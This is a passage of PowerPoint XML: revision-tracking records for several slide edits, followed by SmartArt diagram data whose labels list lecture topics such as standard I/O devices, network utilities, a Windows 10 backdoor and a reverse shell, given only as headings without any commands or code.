          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="16" creationId="{F8730BDB-793B-1014-8282-8B952393E214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="17" creationId="{8CC032C4-89B7-DB99-ABC3-16D128B777F5}"/>
          </ac:spMkLst>
        </pc:spChg>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grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="8" creationId="{1AF44B25-39B4-EDD2-4140-16B3F7C3CE8A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="11" creationId="{527AD5DD-B295-2283-C83A-4CCA76091787}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="14" creationId="{334429DB-D5AE-4151-27CC-E1B608364EC4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:03.897" v="1127" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:picMk id="15" creationId="{79CF65A8-3BAC-A603-E081-E7D33A9739A1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:45:52.675" v="1112" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="2" creationId="{FC692961-5229-6127-3402-D8498ECA5B21}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="3" creationId="{BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="5" creationId="{147A0012-B335-1771-B812-93AD13ED98B3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="6" creationId="{4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="7" creationId="{3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="9" creationId="{EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="10" creationId="{DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="12" creationId="{9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="13" creationId="{28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>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del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:07.319" v="1020" actId="478"/>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grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="10" creationId="{4FFFE899-AC25-2316-2225-FF61F11242D4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="13" creationId="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="18" creationId="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="21" creationId="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="24" creationId="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
          </ac:grpSpMkLst>
        </pc:gr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inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="3" creationId="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="4" creationId="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="8" creationId="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="9" creationId="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="16" creationId="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="17" creationId="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="19" creationId="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="20" creationId="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="22" creationId="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="23" creationId="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:58.902" v="1035" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="25" creationId="{827DF6C7-4049-53AB-E939-22D611165851}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:59.365" v="1036" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="26" creationId="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="27" creationId="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
          </ac:inkMkLst>
        </pc:ink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1-09-09T15:50:59.491" v="261" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494372939" sldId="508"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:59.491" v="261" actId="12"/>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1-09-09T16:33:43.294" v="762"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1-09-09T16:33:43.294" v="762" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910342646" sldId="511"/>
            <ac:spMk id="3" creationId="{E557CAF6-7771-4DA8-97BD-9E8E765BDF8E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:13.660" v="1203" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504836039" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:04:43.926" v="1139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="2" creationId="{07CD4BDF-0DE5-09BD-9D84-5B31B3A1A165}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:20:13.660" v="1203" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="3" creationId="{791C76E6-6D86-29EF-DD53-CB8A670CA499}"/>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D95D1-0E6C-4B88-BBA5-0D119E601AC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7510470-AECF-4261-9C7F-974910BA2CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Standard input/output/error devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119B126-E38B-44E9-B96B-788AABCDDB69}" type="parTrans" cxnId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}" type="sibTrans" cxnId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Network utilities use standard devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37D8D7F6-82EC-4278-A3CE-35C0D79BBAA7}" type="parTrans" cxnId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}" type="sibTrans" cxnId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A85E831-83AC-4CBE-A04A-158534B0B496}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Create a backdoor at Window 10/Remote File Acquisition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8708527-29F1-45AD-84C4-85CC773FA03E}" type="parTrans" cxnId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8947B02-B569-42F0-BA8D-7C4208421369}" type="sibTrans" cxnId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Reverse shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{411B400C-231E-453F-91CE-5A6C51D34DC3}" type="parTrans" cxnId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C32BD346-8926-4CB0-B79C-6724304B462F}" type="sibTrans" cxnId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C77B16AE-79F3-4A91-A144-E4962EB8C3EC}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AED1A57-D364-4000-87E1-862042A86B45}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_1-2" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_2-3" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_3-4" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_1_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69513F20-B31F-4051-9885-18110AD85674}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_2_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_3_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC88EE28-D09C-4C12-BBD0-C28E0CC33576}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_4_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
